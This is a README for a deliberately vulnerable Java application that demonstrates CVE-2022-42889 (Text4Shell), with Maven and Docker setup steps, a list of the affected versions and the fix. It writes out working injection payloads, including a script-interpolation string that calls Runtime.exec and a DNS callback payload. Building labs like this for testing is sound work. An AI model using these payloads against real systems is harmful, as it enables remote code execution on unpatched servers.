Proof of Concept Appliction for testing CVE-2022-42889# CVE-2022-42889 PoC Test Application
This is a vulnerable application developed as a Proof of Concept for the vulnerability [CVE-2022-42889](https://nvd.nist.gov/vuln/detail/CVE-2022-42889).
# Maven Installation
In order to run this you will need:
* JDK 17 or above
* Maven
1. Clone the git repo
```
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
```
2. Maven install to create the JAR
```
mvn clean install
```
This will create the `./target` folder and within that folder should be the JAR file `text4shell-poc-0.0.1-SNAPSHOT.jar`
3. Start the webserver
```
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
```
This will start a web server on your `localhost` listening on port `8080` by default
4. Browse to the webserver
Access the webserver at `http://localhost:8080/` and you should see the following output
```
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
```
5. Exploit manually or perform a scan using [text4shell-scan](https://github.com/securekomodo/text4shell-scan)
Sample Exploit Payloads
```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
```
```
${dns:<burp collaborator host>)}
```
Recommended URL encoder for successful exploit demonstration: [https://www.urlencoder.org/](https://www.urlencoder.org/).
# Docker
Alternatively you can use Docker to be able to run this PoC:
1. Clone the git repo
```
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
```
2. Docker build
```
docker build --tag=text4shell-poc .
```
3. Docker run
```
docker run -p 80:8080 text4shell-poc
```
4. Test the vulnerable app
```
http://localhost/
```
5. Attack can be performed by passing a string “${prefix:name}” like shown below:
```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
```
${dns:<burp collaborator host>)}
```
Recommended URL encoder for successful exploit demonstration: [https://www.urlencoder.org/](https://www.urlencoder.org/).
Alternatively you can validate the effectiveness of scanning tools such as [text4shell-scan](https://github.com/securekomodo/text4shell-scan)
# Are You Vulnerable?
In order for your code to be vulnerable you need to:
* Be running a version of Apache `commons-text` from version `1.5.0` up to (and not including) `1.10.0`
* Using Interpolation for your StringSubstituion (see [https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html](https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html)) - note this is not super common
# The Fix
The fix for this is to update your instances of `commons-text` to versions `1.10.0` or later.
# Author
*Bryan Smith*
* Twitter: [https://twitter.com/securekomodo](https://twitter.com/securekomodo)
[4.0K] /data/pocs/ce3c5170f55a547bf53fd7fc58f7731cb97213c2
├── [1.4K] Dockerfile
├── [1.0K] LICENSE
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [1.5K] pom.xml
├── [2.9K] README.md
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] securekomodo
│ │ └── [4.0K] text4shellpoc
│ │ ├── [4.0K] controller
│ │ │ └── [1.6K] webController.java
│ │ └── [ 337] Text4shellPocApplication.java
│ └── [4.0K] resources
│ └── [ 1] application.properties
└── [4.0K] test
└── [4.0K] java
└── [4.0K] com
└── [4.0K] securekomodo
└── [4.0K] text4shellpoc
└── [ 89] Text4shellPocApplicationTests.java
13 directories, 10 files